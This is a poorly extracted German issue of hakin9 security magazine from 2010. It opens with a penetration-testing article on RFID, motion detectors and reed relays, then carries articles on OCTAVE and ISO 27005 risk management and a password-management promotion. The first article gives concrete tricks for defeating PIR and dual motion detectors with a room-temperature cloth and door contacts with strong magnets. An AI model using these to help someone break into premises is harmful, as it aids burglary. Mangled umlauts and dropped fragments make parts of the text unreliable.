Aus der Praxis kann ich sagen dass etwa 90 al-ler RFID-Karten-Systeme sich nur mit der Serien-nummer des Tags zufrieden geben Aumlltere Garagen-toroumlffner arbeiten mit einem statischen Code Neuere Garagentoroumlffner und einige Autohersteller nutzen ei-nen Rolling Code um den Nutzer zu identifizieren Im Maumlrz 2008 wurde auch dieses System von Forschern der Ruhr-Universitaumlt Bochum geknackt Zwei aufge-zeichnete Kommunikationen genuumlgen bereits fuumlr ei-ne Seitenkanalattacke Ebenfalls wurde im Jahr 2008 die Verschluumlsselung des Mifare-Systems per Rever-se Engineering geknackt Solche Verschluumlsslungen verlangsamen nur den Angriff und machen ihn teurer
Gibt es auch sichere RFID-Systeme Die gibt es durchaus Hier verwendet man eine asymmetrische Verschluumlsselung Fuumlr jedes zugangs-
berechtigte Tag wird ein privater und ein oumlffentlicher Schluumlssel erzeugt Der private Schluumlssel wird in einer Datenbank gespeichert auf die das Lesegeraumlt zu-greifen kann Der oumlffentliche Schluumlssel wird auf dem Tag gespeichert Die Identifizierung erfolgt dann in mehreren Schritten Wie oben bereits beschrieben faumlngt das Tag mit der Identifikation an indem es dem Lesegeraumlt seine Seriennummer mitteilt Das Lesege-raumlt generiert daraufhin eine Zufallszahl und sendet diese mit der Seriennummer des Tags wieder zuruumlck (Da die Kommunikation uumlber Funk erfolgt kann es sein dass zur gleichen Zeit mehrere RFID Tags aktiv sind Deshalb muss man waumlhrend der Kommunikati-on stets angeben fuumlr welchen Empfaumlnger eine Nach-richt bestimmt ist) Das Tag empfaumlngt die Nachricht verschluumlsselt diese mit dem oumlffentlichen Schluumlssel und sendet sie an das Lesegeraumlt zuruumlck Kann das Lesegeraumlt die empfangene Nachricht mit dem priva-ten Schluumlssel des Tags entschluumlsseln und stimmt die Nachricht mit der Zufallszahl uumlberein wird der Zu-gang gewaumlhrt
BewegungsmelderBewegungsmelder verwenden fuumlr die Bewegungsde-tektion Passiv Infrarot Sensoren (PIR) Jedes Objekt emittiert eine Waumlrmestrahlung ein PIR Sensor kann diese Strahlung messen Um Bewegungen detektieren zu koumlnnen wird der Sensor mit Buumlndellinsen in Be-reiche aufgeteilt Aumlndert sich die einfallende Strahlung in einem Bereich um einen bestimmten Schwellwert wird dies als Bewegung interpretiert Der Schwellwert sorgt auszligerdem dafuumlr dass statische Temperaturver-aumlnderungen der Umgebung nicht als Bewegung ge-deutet werden Diese Funktionsweise ist leider Fehler-anfaumlllig so kann zB ein kalter Luftstrom bereits einen Bewegungsmelder ausloumlsen Hierfuumlr setzen bessere Bewegungsmelder (Dualmelder) zusaumltzlich noch ei-nen Ultraschall-Sensor ein Nur wenn beide Sensoren ausloumlsen wird eine Bewegung gemeldet Damit sol-len Fehlalarme verhindert werden VdS-Anerkannte Bewegungsmelder die in Alarmanlagen verwendet werden loumlsen zusaumltzlich Alarm aus wenn diese ab-gedeckt werden
Wie kann man Bewegungsmelder uumlberlisten Je groumlszliger die Entfernung zu dem PIR Sensor ist des-to weniger nimmt eine Veraumlnderung Einfluss auf die einfallende Infrarotstrahlung in einem Bereich Auch haben Gegenstaumlnde mit gleicher Waumlrmestrahlung kei-nen Einfluss auf die Sensoren Einen Bewegungsmel-der (auch einen Dualmelder) kann man deshalb mit ei-nem Tuch uumlberlisten Zunaumlchst laumlsst man das Tuch im uumlberwachten Raum einige Minuten liegen damit es die Temperatur der Umgebung annimmt Wenn man sich jetzt in dieses Tuch einhuumlllt und seitwaumlrts mit dem Ruuml-cken zum Bewegungsmelder langsam an diesem vor-
Abbildung 9 Eine Buumlroklammer ist an einer Schnurr befestigt Selbst bei einem Abstand von 35cm ist das Magnetfeld noch so stark dass die Buumlroklammer in der Luft haumlngt
Magnete sind kein Spielzeug
Penetration Testing im Jahre 2010
hakin9orgde 23
beigeht wird keine Bewegung angezeigt Zwar merkt bei einem Dualmelder der Ultraschall-Sensor die Be-wegung da jedoch der Infrarot Sensor keine Bewe-gung meldet findet keine Alarmierung statt Wuumlrde man dieses Tuch etwa 30cm vor dem Bewegungsmel-der aufspannen wuumlrde man den Bewegungsmelder auszliger Funktion setzen Auch eine Abdeckerkennung wuumlrde hier nicht ausloumlsen da diese in der Regel bis 20cm funktioniert
Gibt es AlternativenSicherlich gibt es sie Zunaumlchst einmal gibt es Bewe-gungsmelder die auf Basis von Radarstrahlung funk-tionieren Diese aktiven Bewegungsmelder koumlnnen verdeckt zB unter einer Tapete oder Abdeckplatte in-stalliert werden Dadurch ist ein solcher Bewegungs-meder sowohl optisch nicht wahrnehmbar als auch vor Sabotage und Vandalismus geschuumltzt Ein solcher Bewegungsmelder arbeitet nach dem Dopplerprinzip und strahlt im 9GHz oder 24GHz-Mikrowellenbereich Zwar halten sich die Hersteller solcher Geraumlte an die gesetzlichen Bestimmungen ich wuumlrde allerdings im-mer auf eine zusaumltzliche Strahlenquelle verzichten wo es geht
Eine weitere Alternative zu Bewegungsmeldern sind Kameras Zwar halte ich persoumlnlich nichts von Uumlber-wachung und staumlndiger Videoaufzeichnung doch Kameras sind sehr gute Bewegungsmelder Im Ge-gensatz zu den klassischen PIR Ultraschall oder Ra-darbewegungsmeldern gibt es bei Kameras zahlrei-che Bildpunkte die ausgewertet werden koumlnnen Mit entsprechender Software kann man detektierte Bewe-gungen analysieren und zB mit einer Objekterken-nung interpretieren Verdaumlchtige Bilder lassen sich an ein Sicherheitsunternehmen in Echtzeit uumlbertragen wo ein Mensch beurteilt ob ein Alarm ausgeloumlst wer-den muss oder nicht
Reed-RelaisReed-Relais werden heute verwendet um zB Tuumlr- oder Fensteroumlffnungen zu detektieren Ein Reed-Re-lais besteht einem Reed-Kontakt und einem Magne-ten Der Reed-Kontakt wird am Rahmen befestigt und ist an die Einbruchmeldezentrale angeschlossen Der
Magnet wird auf dem beweglichen Element in Houmlhe des Kontaktes befestigt Wirkt ein Magnetfeld auf den Reed-Kontakt ziehen sich die Schaltkontakte gegen-seitig an und ein Stromkreis wird geschlossen Laumlsst das Magnetfeld nach wenn zB eine Tuumlr geoumlffnet wird und sich der Magnet dem Reed-Kontakt entfernt wird der Stromkreis geoumlffnet In diesem Fall wird dann der Alarm ausgeloumlst
Wie lassen sich Reed-Relais uumlberlisten Das ist vergleichbar einfach Die Antwort auf diese Fra-ge lautet natuumlrlich mit einem Magnetfeld Hierfuumlr eig-nen sich sogenannte bdquoTodesmagnetenldquo (Abbildung 9) Diese Permanentmagneten haben ein extrem starkes Magnetfeld Unter Laborbedingungen hat ein Reed-Kontant bereits bei einer Entfernung von 40cm zum Magneten seine Schaltkontakte geschlossen Holz- Plastik- oder sogar Metall-Tuumlren (sogar 2mm Stahl) bieten keine ausreichende Daumlmpfung fuumlr das Magnet-feld
Eine bessere Alternative zu Reed-Relais sind Licht- oder Laserschranken Diese Schranken bringt man so an dass die Tuumlr den Strahl beim oumlffnen unterbrechen muss
Ziele eines solchen AngriffesEs sind viele Angriffsziele denkbar Es kommt immer auf das Unternehmen an dass angegriffen wird Vor einigen Monaten berichtete die Presse uumlber einen sol-chen Angriff auf einen Baumarkt Kriminelle Einbre-cher haben hier statt waren zu stehlen die Elektronik der Karten-Terminals an den Kassen sabotiert sodass diese die eingelesenen Daten von EC- und Kreditkar-ten samt der vom Kunden eingegebenen PIN per Funk uumlbermittelt wurden Auf dem Parkplatz des Baumark-tes stand dann der Angreifer und hat die Daten emp-fangen
Ein anderes Angriffsziel koumlnnte der Anschluss eines Mini-Computers am Netzwerk sein der ein Loch durch die Firewall bohrt und dem Angreifer einen permanen-ten Zugriff auf das Netzwerk uumlber das Internet gestat-tet Auch ist die Installation eines Hardware-Keylogers denkbar um die Zugangsdaten eines Mitarbeiters aus-zuspionieren
DIMITRI ROSCHKOWSKIDer Autor arbeitet bereits seit vielen Jahren als selbststaumlndi-ger IT-Sicherheitsexperte und Consultant Er fuumlhrt auszligerdem bei Unternehmen Penetration Tests durchKontakt mit dem Autor dimitriroschkowskibiz
Im InternethttpdewikipediaorgwikiLockpicking ndash Wikipedia Ein-trag zum Thema LockpickinghttpwwwevvadezylindernhttpdewikipediaorgwikiReed-Relais ndash Wikipedia Ein-trag zum Reed-Relaishttpwwwelvde ndash Artikel-Nr 68-835-10 ndash Radar Bewe-gungsmelderhttpwwwettuscom
Die IT-Security Community Xchange ist DIE Weiterbildungsnacht fuumlr SystemadministratorInnen Lehrbeauftragte StudentInnen Schuumller-Innen ExpertInnen und Geeks
Themen BiometriePenetration TestingHackz und Crackz Privacy Forensische Analyse Intrusion Prevention Malwarededection Rootkits und deren Erkennung
Freitag 12 November 2010 17 ndash 24 UhrFachhochschule St PoumlltenMatthias Corvinus-Straszlige 15 3100 St PoumlltenT +432742313 228 E officefhstpacatI wwwfhstpacat
Jetzt noch schnell
anmelden unter
httpitsecxfhstpacat
Die Teilnahme ist kostenlos
12-11-2010
OCTAVE
hakin9orgde 25
Um dies zielorientiert und auf die vorhandenen Business Needs maszligzuschneidern sind Risiko-erkennung (Risikoanalyse) und deren anschlie-
szligende Bewertung (Business Impact Analyse) die ersten Schritte die gemacht werden muumlssen
Eine effektive Informations-Sicherheitsbewertung be-trachtet nicht nur den technologischen sondern auch den dahinter liegenden organisatorischen Aspekt Bei-spielsweise die Handhabung der IT-Infrastruktur durch die MitarbeiterInnen bei ihrer taumlglichen Arbeit Durch ei-
ne Risikoanalyse erhaumllt man einen organisationsweiten Uumlberblick uumlber vorhandene Risiken und ist somit integ-raler Bestandteil des Risikomanagements (vergl Abb 1)
OCTAVE ist eine risikobasierende strategische Si-cherheitsbewertungs und -planungstechnik
OCTAVEreg ist ein Kunstwort und setzt sich aus den Begriffen Operationally Critical Threat Asset and Vul-nerability Evaluation zusammen Sie wurde von der Carnegie Mellon University welche auch die populaumlre
OCTAVE ndashHier macht das Risiko die MusikDie uumlberwiegende Mehrheit von Unternehmen sind nach regulativen Vorgaben wie zB Basel II Solvency II SOX 8 EU Auditrichtlinie oder SAS 70 angehalten ein nachhaltiges und nachvollziehbares Risikomanagement und Business Continuity Planning zu implementieren
IN DIESEM ARTIKEL ERFAHREN SIE
ren
WAS SIE VORHER WISSENKOumlNNEN SOLLTEN
men und Standards
Helmut Kaufmann
Abbildung 2 CIAAbbildung 1 Risikomanagementzyklus
10201026
ABWEHR
heitspraxis und Technologie ins Gleichgewicht zu setz-ten Getrieben von zwei Grundaspekten ndash operationel-les Risiko und aktuell eingesetzte Sicherheitspraktiken wird die dahinter liegende Technologie in Zusammen-hang mit der Sicherheitspraxis gegen die drei Eckpfeiler der Sicherheit gepruumlft (vergl Abb 2)
OCTAVE ist ein wertegetriebener Bewertungsansatz Das Analysis Team
die Organisation wichtig sind
diejenigen Werte die als besonders kritisch beur-teilt werden Beruumlcksichtigt die Zusammenhaumlnge zwischen den kritischen Assets den Bedrohungen und den Verwundbarkeiten
menhang
(organisatorisch und auch einen Plan zur Reduzie-rung der Risiken auf kritische Infrastrukturen)
Daraus resultiert ein dreiphasiges Vorgehensmo-dell fuumlr die Erhebung des gesamtorganisatorischen Schutzbeduumlrfnisses (vergl Abb 3)
Aufbau von Asset-basierenden Bedro-
ndash Das Analyse Team stellt informati-
Web-Site wwwcertorg betreibt passend fuumlr die unter-schiedlichsten Unternehmensgroumlszligen als lizenzfreie Risikoanalyse Methode entwickelt
OCTAVE ist eine selbstgesteuerte Methode Das be-deutet dass die MitarbeiterInnen einer Organisation eine wesentliche Rolle bei der Erstellung der Sicher-heitsstrategie uumlbernehmen Risiken von hoch kritisch erkannten Assets werden dazu verwendet um eine entsprechende Priorisierung der Sicherheitsbereiche durchzufuumlhren
Im Gegensatz zu typischen technologielastigen Be-wertungsmethoden die technologische Risiken und taktische Sachverhalte in den Mittelpunkt der Betrach-tung stellen ist OCTAVE auf organisatorische Risiken und deren dazu notwendigen Technologieeinsatz aus-gerichtet Sie ist eine aumluszligerst flexible Methode die fuumlr fast alle Organisationen speziell angepasst werden kann Aus der Sichtweise des Autors ist einer der be-merkenswertesten Vorteile jedoch dass die Methode von den MitarbeiterInnen selbst schnell erlernt und kon-tinuierlich durchgefuumlhrt werden kann und somit nach-haltig in den Risikomanagementprozess ohne weitere Kosten integrierbar ist
Ein ausgewaumlhltes kleines Team aus allen operatio-nellen Bereichen der Organisation inklusive der IT Ab-teilung arbeiten zusammen um die Sicherheitsbeduumlrf-nisse der Organisation zu identifizieren und versuchen die Gebiete Operationelles Risiko eingesetzte Sicher-
Abbildung 3 Octave Phasen
OCTAVE
hakin9orgde 27
onsbezogene Assets und deren Impact auf die Or-ganisation sowie deren derzeitige Schutzmechanis-men fest Darauf aufbauend werden die kritischsten
dafuumlr bestimmt Anschlieszligend wird fuumlr jedes kri-
Erkennen von Verwundbarkeiten der Infra-
struktur ndash Hier wird die hinter den kritischen Assets liegende Infrastruktur bewertet Dabei werden kriti-sche Infrastrukturpfade und informationstechnolo-gische Komponentenklassen aufgestellt und einer technischen Uumlberpruumlfung ndash dem Penetration Test ndash
tung direkt ein
ndash In dieser Phase ent-scheidet das Analyse-Team wie mit den kritischen Assets umgegangen werden soll Basierend auf die
organisationsweite Schutzstrategie und ein Plan fuumlr die Reduzierung der erkannten Risiken die auf die kritischen Assets und deren Infrastrukturen einwir-ken koumlnnen erstellt
Die einzelnen Prozesse die den drei Phasen hinter-legt sind stellen sicher dass von allen Organisati-
onseinheiten und von allen hierarchischen Ebenen ndash also von den MitarbeiterInnen uumlber operationa-les und strategisches Management bis hin zum Ma-nagement der ersten Ebene alle Sichtweisen und die damit verbundenen Bewertungen der kritisch-
koumlnnen OCTAVE generiert so eine organisationsweite Sicht
auf die aktuellen Informationssicherheitsrisiken
zen
wie die erstellte Schutzstrategie und der Plan zur Risikoreduzierung umgesetzt werden kann
Handlungs-Planes
UumlberwachenBeobachten des Handlungsplanes nach Effektivitaumlt Das beinhaltet zB das Beobachten der Risiken fuumlr jede Aumlnderung
ken
Die OCTAVE Methode ersetzt kein Risikomanagement sondern gehoumlrt in ein strukturiertes Risikomanage-
Abbildung 4 Octave und Risikomanagement
10201028
ABWEHR
ment eingebettet welches nach einem act Zyklus arbeitet (vergl Abb 4)
Die Organisation sollte in periodischen Abstaumlnden ihre ermittelte Baseline zuruumlcksetzen indem eine nochmalige Risikoanalyse durchgefuumlhrt wird Diese Zeitspanne kann vorgegeben werden oder von wich-tigen Ereignissen wie zB eine Restrukturierungs-maszlignahme der zB Netzwerkinfrastruktur uvm an-gestoszligen werden Zwischen den Analysen kann die Organisation periodisch neue Risiken identifizieren analysieren und in Relation zu bereits existieren-den Risiken Risiko reduzierende Maszlignahmen entwi-ckeln
Da die Risikoanalyse nur einen Teil des Risikoma-nagements darstellt ist die OCTAVE Methode mit ih-rer offenen Schnittstelle hervorragend geeignet um als bdquoBest Practiceldquo-Grundlage die ISO 27001 Norm zu im-
plementieren und in der Umsetzungsphase den COBIT 40 Standard zu verwenden
OCTAVE bildet die Grundlage der in der ISO 27001
trachtungsbereiches feststellen von kritischen Orga-nisationswerten qualitative und eventuell quantitative Betrachtung von Risiken Entwicklung von entspre-chenden Kontrollmaszlignahmen um Risiken zu minimie-ren oder aber auch zu akzeptieren Anschlieszligend kann man unter Zuhilfenahme von COBIT die der ISO Norm zugeschriebenen Kontrollen implementieren Man kann somit die IT Sicherheitsstrategie der betrachteten Organisation mit einer Risikoanalyse nach dem OCTA-VE Ansatz und dem standardisierten Reifegrad-Modell nach COBIT - gepruumlft nach ISO 27001 - auswerten und umsetzen (Verg Abb 5)
Abbildung 5 Mapping auf ISO 27001
Mehr Informationenwwwcertorgoctave
wwwisacaorgwwwstandards-onlinenetInformationSecurity-
Standardhtm
MAG HELMUT KAUFMANN MSCDozent an der Fachhochschule St Poumllten und ua taumltig im Be-reich Secure Data Center Management Cloud Computing Di-saster Recovery and Business Continuity Fraud Detection
News
hakin9orgde 29
Tausende Passwoumlrter von Usern und Administratoren sind im UmlaufMan stelle sich komplexe IT Landschaften vor die geo-
grafisch verteilt sind und viele Mitarbeiter die in verschie-
dene bdquoRollenldquo schluumlpfen Eine Buchhalterin hat nicht nur
Zugang zu standardisierten Anwendungen sondern auch
zum Internetbanking der FIBU Software und anderen
kaufmaumlnnischen Programmen wie SAP Interessant und
zunehmend komplex wird es bei den IT Administratoren
Natuumlrlich koumlnnen sich diese von vielen fuumlr ihre mathema-
tischen Faumlhigkeiten bewunderten auch nicht dutzende
von Passwoumlrtern merken sondern helfen etwas nach Pro
Anwendung wird ein Passwort vergeben das sich diese
dann fuumlr laumlngere Zeit im Gedaumlchtnis behalten Mit dieser
Feststellung wird die gesamte Problematik sofort offenbar
ohne in technische Details gehen zu muumlssen ein Pass-
wort fuumlr laumlngere Zeit im Gedaumlchtnis
Guter Rat ist teuer - und umsonstRichtlinien zur Passwortgestaltung gibt es unzaumlhlige und
viele sind gut gemeint Die Laumlnge wird vorgegeben und
auch die zu verwendenden Zeichen die alle 4 Wochen
zu aumlndern sind und natuumlrlich nicht auf einem Post-It unter
der Tastatur kleben sollen Selbst wenn dies eingehal-
ten wird vergisst man sein neues Passwort spaumltestens
wenn man 2 Wochen auf Urlaub war und auch der Help-
Desk freut sich dass man wieder zuruumlck ist Auch der
Auditor ist zumindest milde gestimmt wenn die zentralen
Passwoumlrter zumindest in einer gesicherten Excel Liste
zusammengefasst sind Von IT Security sollte man aber
dabei besser nicht sprechen da jeder Administrator auf
alle Passwoumlrter zugreifen kann Spaumltestens bei automa-
tisierten (unattended) Passwoumlrtern die via Skript fixiert
sind und auf eine Anwendung oder Datenbank zugreifen
sind verhaltensorientierte Ansaumltze obsolete
Passwortstruktur ist unbekanntKaum ein IT Verantwortlicher hat verlaumlssliche Informa-
tionen uumlber die Strukturen und Verbreitungsgrade von
Passwoumlrtern in einer Organisation Bei Implementie-
rung eines automatisierten Passwort-Managements
wird oft erst festgestellt dass zehntausende privilegier-
te Administratorkonten vorhanden sind aber nur 20
davon als Administratorkonten dienen Der uumlberwiegen-
de Teil der Passwoumlrter sind Application-to-Application
(A2A) und Application-to-Database (A2D) Konten die
in Skripts den Zugriff ermoumlglichen Und natuumlrlich nur in
seltensten Faumlllen geaumlndert werden und somit immer ei-
ne Hintertuumlre auch fuumlr den Ex-Mitarbeiter offenlassen
Die Passwort Autoritaumlt Freiwilligkeit und Empfehlungen sind nicht angebracht Die Zugangsberechtigungen sind als Schluumlssel fuumlr Safes
mit allen Geheimnissen der Organisation anzusehen Das
Ergebnis einer Reflektion der Problematik bdquoPasswoumlrterldquo
kann nur sein dass ein automatisiertes und auditierbares
Software-Werkzeug in Frage kommen kann Die Durchset-
zung der Passwoumlrter Policies Zuteilung von Einmal-Pass-
woumlrtern und vor allem eine sichere Authentifizierung und
Ablage dieser ist natuumlrlich ebenso ein Must-Have In Zeiten
wie diesen sollte es auf Knopfdruck moumlglich sein einen Ad-
ministrator zu sperren oder zeitlich begrenzte Passwoumlrter
fuumlr externe Dienstleister ausstellen zu koumlnnen
Antares NetlogiX empfiehlt nach eingehender Analy-
se - des sehr uumlberschaubaren Marktes - die Loumlsung
bdquoCloakware Password Authorityldquo Die ersten erfolgrei-
chen Referenzprojekte und Kundenmeinungen haben
diese Meinung weiter verstaumlrkt
Wetten dass Ihr groumlszligtes Betriebsgeheimnis ungeschuumltzt istWie ein schlechter Sickerwitz stellt man sich zuerst die Frage was ist unser groumlszligtes Betriebsgeheimnis Die Kundenlisten die Projektdokumentationen und Strategiepapiere die Zahlen auf den Bankkonten oder gar die private Telefonnummer vom Vorstandsvorsitzenden Schlussendlich sind es die Passwoumlrter und Zugangsberechtigungen auf saumlmtliche Anwendungen und Datenbanken in jedem Unternehmen oder Organisation
10201030
ABWEHR
In der heutigen Ausgabe werde ich Ihnen darstellen warum es nuumltzlich ist sich mit dem Risikomanage-ment der IT zu beschaumlftigen und dabei auf das Mo-
dell der ISO 27005 zuruumlck zu greifenAuf dieses Thema wurde bereits in einer fruumlheren
Ausgabe eingegangen in diesem Artikel wird aber mehr auf die Norm und den eigentlichen Prozess mit den einzelnen Schritten eingegangen
Groumlszligere Unternehmen sind schon von Gesetz her verpflichtet sich mit dem Themenbereich Risiko-management zu beschaumlftigen (Aktiengesetz Kon-TraG GmbH-Gesetz uAuml) Ein Teil dieses Risikoma-nagements ist das IT-Risikomanagement welches sich ndash wie der Name es schon sagt ndash mit den Risi-ken im IT-Bereich beschaumlftigt Eine Problematik beim Risikomanagement allgemein und speziell bei der
IT-Risikomanagement ndash Wozu brauche ich das
In der letzten Ausgabe habe ich Ihnen ausfuumlhrlich die Norm ISOIEC 27001 vorgestellt und einen kurzen Einblick in die 27000-Familie gegeben Ein Teil dieser Familie ist die ISO 27005 die sich mit dem IT-Risikomanagement befasst
IN DIESEM ARTIKEL ERFAHREN SIE WAS SIE VORHER WISSENKOumlNNEN SOLLTEN
men
IEC 27001)
Andreas Lentwojt
Abbildung 1 Aufbau eines Risikomanagementsystems (allgemein)
IT-Risikomanagement ndash Wozu brauche ich das
hakin9orgde 31
entgegenwirkt Richtlinien wie Basel II oder Euro-SOX fordern diese Ausrichtung seit langem
Die ISO 27005 ist branchen- und groumlszligenunabhaumlngig Somit koumlnnen auch kleinere und mittlere Unternehmen durch die Adaption der Inhalte auf die betrieblichen An-forderungen ein schlankes und effektives IT-Risikoma-nagement aufbauen Gerade sensible Branchen wie Automotive Healthcare Software oder Telekommuni-kation werden hier angesprochen Aufgrund aumlhnlicher Strukturen laumlsst sich die ISO 27005 ohne groumlszligeren Auf-wand in ein unternehmensweites Risikomanagement integrieren kann aber auch raquosololaquo umgesetzt werden Im Gegensatz zur ISOIEC 27001 ist die ISOIEC 27005 selbst nicht zertifizierbar
Kapitel 1 ndash Risikomanagementsystem allgemeinWie bei der ISO 27001 geht es auch bei der ISO 27005 nicht um das bdquowasldquo sondern um das bdquowieldquo Es ist ein Leitfaden zur Implementierung eines Risikoprozesses im Kontext der Informations- und Telekommunikations-technologie Wie sieht so ein Risikoprozess nun aus Ganz allgemein betrachtet geht es wiederum um ein Managementsystem welches aus 6 Schritten (vergl Abb 1) besteht
Informationstechnologie ist die Bewertung der er-kannten Risiken Bereits seit einigen Jahren gab es nationale Normen die sich mit einem standardisier-ten Vorgehensmodell beschaumlftigten Im Juni 2008 wurde daraus die international anerkannte Norm ISOIEC 270052008 (ehem BS 7799-32006) ISO 270052008 ist eine spezielle Auspraumlgung der ISOIEC 310002009 die sich mit dem Risikomanagement all-gemein befasst Die genauen Bezeichnungen lauten
les and guidelinesldquo
nagementldquo
Warum uumlberhaupt ein IT-Risikomanagementsystem im Unternehmens-Kontext
Datenverlust und -diebstahl gehoumlren zu den groumlszligten Problemen in Unternehmen Bisher bezog sich Risiko-management in Unternehmen hauptsaumlchlich auf Markt- und Adressrisiken sowie auf finanzielle Risikofaktoren Das Risikomanagement im IT-Bereich wurde weitgehend vernachlaumlssigt Dabei lassen sich Sicherheitsluumlcken mit-tels Risikomanagement aufdecken und minimieren was auch Regressforderungen an die Unternehmensfuumlhrung
Abbildung 2 Aufbau der ISO 270052008
10201032
ABWEHR
Kapitel 2 ndash Der Standard ISOIEC 270052008Die ISO 27005 stellt eine Anleitung zur IT Risikoanaly-se und zum Risikomanagement im IT Bereich dar Sie beinhaltet dabei einerseits eine Beschreibung des kom-pletten Risikomanagementprozesses als Ganzes und andererseits eine genaue Beschreibung der einzelnen Schritte des Risikomanagementprozesses und der Ri-sikoanalyse Die Anhaumlnge der IEC 27005 liefern zudem nuumltzliche Informationen zur Implementierung eines Ri-sikomanagementsystems im Bereich Informationssi-
Norm ISO 27001
gen auf bedrohte Werte direkte und indirekte Be-drohungen und Schwachstellen
schaumltzung der Risikowahrscheinlichkeit und des Ri-sikoniveaus
managementmaszlignahmen
Aus diesen einzelnen Kapiteln der Norm wird der IT-Sicherheitsprozess entwickelt (vergl Abb 3)
Kapitel 3 ndash Die Phasen
Defi nition der RahmenbedingungenIn einem ersten Schritt wird in einer Schutzbedarfsfest-stellung (High Level Risk Analysis) der Schutzbedarf fuumlr
Schutzbedarfskategorie niedrig bis hoch wird idR auf eine detaillierte Risikoanalyse verzichtet Dies erlaubt ei-ne schnelle und effektive Auswahl von grundlegenden Sicherheitsmaszlignahmen bei gleichzeitiger Gewaumlhrleis-tung eines angemessenen Schutzniveaus IT-Systeme der Schutzbedarfskategorie bdquosehr hoch sind einer de-taillierten Risikoanalyse zu unterziehen auf deren Basis individuelle Sicherheitsmaszlignahmen ausgewaumlhlt werden
Abbildung 3 Der Sicherheitsprozess gem ISO 270052008
IT-Risikomanagement ndash Wozu brauche ich das
hakin9orgde 33
Diese Option kombiniert die Vorteile des Grund-schutz- und des Risikoanalyseansatzes da alle IT-Systeme mit hohem Schutzbedarf wirksam und ange-messen geschuumltzt werden Maszlignahmen koumlnnen fuumlr die anderen Systeme mit Hilfe des Grundschutzes schnell und effektiv ausgewaumlhlt werden Diese Methode stellt in den meisten Einsatzumgebungen eine empfehlenswer-te Strategie zur Risikoanalyse dar
Zu den einzelnen Kriterien die festgelegt werden muumlssen gehoumlren ua
RisikobewertungDie Risikobewertung gliedert sich in die beiden Vor-gaumlnge Risikoanalyse und der Priorisierung der Risiken Die Risikoanalyse ist sicherlich der schwierigste und aufwendigste Teil muumlssen doch zunaumlchst die Risiken
-setsldquo des Unternehmens wird folgender Prozess durch-laufen
Dieser Prozess wird fuumlr alle Assets wiederholt Ein As-set im Sinne der ISO 27005 ist alles was einen Wert fuumlr die Organisation besitzt und daher schuumltzenswert
Rahmenbedingungen den zu betrachtenden Rahmen zunaumlchst eng zu fassen Er kann spaumlter immer noch erweitert werden Die Norm unterteilt hierbei in primauml-re Assets (Geschaumlftsprozesse und ndashaktivitaumlten Infor-mationen) und unterstuumltzende Assets (Hard- und Soft-ware Netzwerk Personal Infrastruktur etc) Eine de-
NormAus dem beschriebenen Prozess erfolgt eine Analyse
und Auflistung der Konsequenzen und letztendlich eine Risikoeinschaumltzung
--
wertung nach Zeitwert nach Wiederbeschaffungswert nach dem Wert fuumlr einen potenziellen Angreifer oder nach dem Schaden fuumlr die Organisation aus einem Ver-lust des Assets Immaterielle Werte werden idR nach dem Wert fuumlr einen potenziellen Angreifer oder nach dem Schaden fuumlr die Organisation aus einem Verlust des As-sets bewertet Bei der Bewertung ist zu beachten dass Wertekombinationen haumlufig nicht der Summe der Einzel-
werte entsprechen da sich die Werte in Kombination er-gaumlnzen und einen houmlheren Wert darstellen
Die zu schuumltzenden Werte sind vielfaumlltigen Be-drohungen ausgesetzt Im Rahmen der Risikoana-lyse ist nun die Eintrittswahrscheinlichkeit abzu-schaumltzen
Bedrohungen sind charakterisiert durch
-vorteile Rache)
-hung verursacht werden kann
-ben Blitzschlag ) liegen statistische Daten vor die fuumlr die Einschaumltzung hilfreich sein koumlnnen
Die Bedrohungsanalyse umfasst im Einzelnen
Bedrohungen koumlnnen unterteilt werden in
-sonalausfall)
-chende Dokumentation)
-nutzung oder -administration Nichtbeachtung von Sicherheitsmaszlignahmen)
-tentraumlger)
von Geraumlten Manipulation an Daten oder Software Viren trojanische Pferde)
Es ist wichtig alle wesentlichen Bedrohungen zu er-fassen da andernfalls Sicherheitsluumlcken bestehen bleiben koumlnnen Im Anhang C der Norm ist eine um-fangreiche Listung von Bedrohungen vorhanden je-doch kann keine derartige Liste vollstaumlndig sein Da-ruumlber hinaus sind auch Bedrohungen einem staumlndigen Wandel und einer staumlndigen Weiterentwicklung unter-worfen
Nachdem Werte und Bedrohungen erfasst wurden muss nun die Eintrittswahrscheinlichkeit zugeordnet werden Es ist also zu bestimmen mit welcher Wahr-scheinlichkeit eine Bedrohung im betrachteten Umfeld eintreten wird
Auch die Eintrittswahrscheinlichkeit kann quantita-tiv oder qualitativ bewertet werden Da eine quantita-
-taumluschen koumlnnte ist in den letzten Jahren ein Trend in Richtung qualitativer Bewertung zu erkennen
10201034
ABWEHR
Bewaumlhrt haben sich hier etwa drei- bis fuumlnfteilige Ska-len (zB 4 sehr haumlufig hellip 0 sehr selten)
Diese allgemeinen Bedeutungen der Skalenwerte koumlnnen fuumlr jeden einzelnen spezifischen Anwendungs-bereich konkretisiert werden
Nachdem Werte Bedrohungen und Eintrittswahr-scheinlichkeiten definiert sind wird eine Schwachstellen-analyse durchgefuumlhrt Unter einer Schwachstelle (Vulne-rability) versteht man eine Sicherheitsschwaumlche eines oder mehrerer Objekte die durch eine Bedrohung ausge-nuumltzt werden kann Eine Schwachstelle selbst verursacht noch keinen Schaden sie ist aber die Voraussetzung die es einer Bedrohung ermoumlglicht wirksam zu werden Typische Beispiele fuumlr Schwachstellen sind etwa
Mangelnder baulicher Schutz von Raumlumen mit IT-Ein-richtungen
heitsbewusstsein
Sicherheitsschwaumlchen und muss sowohl das Umfeld als auch bereits vorhandene Schutzmaszlignahmen mit einbeziehen Es ist wichtig jede Schwachstelle da-raufhin zu bewerten wie leicht es ist sie auszunutzen
Vor der eigentlichen Risikobewertung werden noch die bestehenden Sicherheitsmaszlignahmen betrachtet und bewertet Stellt sich heraus dass eine bereits exis-tierende oder geplante Maszlignahme ihren Anforderun-gen nicht gerecht wird so ist zu pruumlfen ob sie ersatz-los entfernt durch andere Maszlignahmen ersetzt oder aus Kostengruumlnden belassen werden soll
Im Rahmen dieses Schrittes sollte auch gepruumlft wer-den ob die bereits existierenden Sicherheitsmaszlignah-
staumlndig eingesetzte Sicherheitsmaszlignahmen stellen eine zusaumltzliche potentielle Schwachstelle eines Systems dar
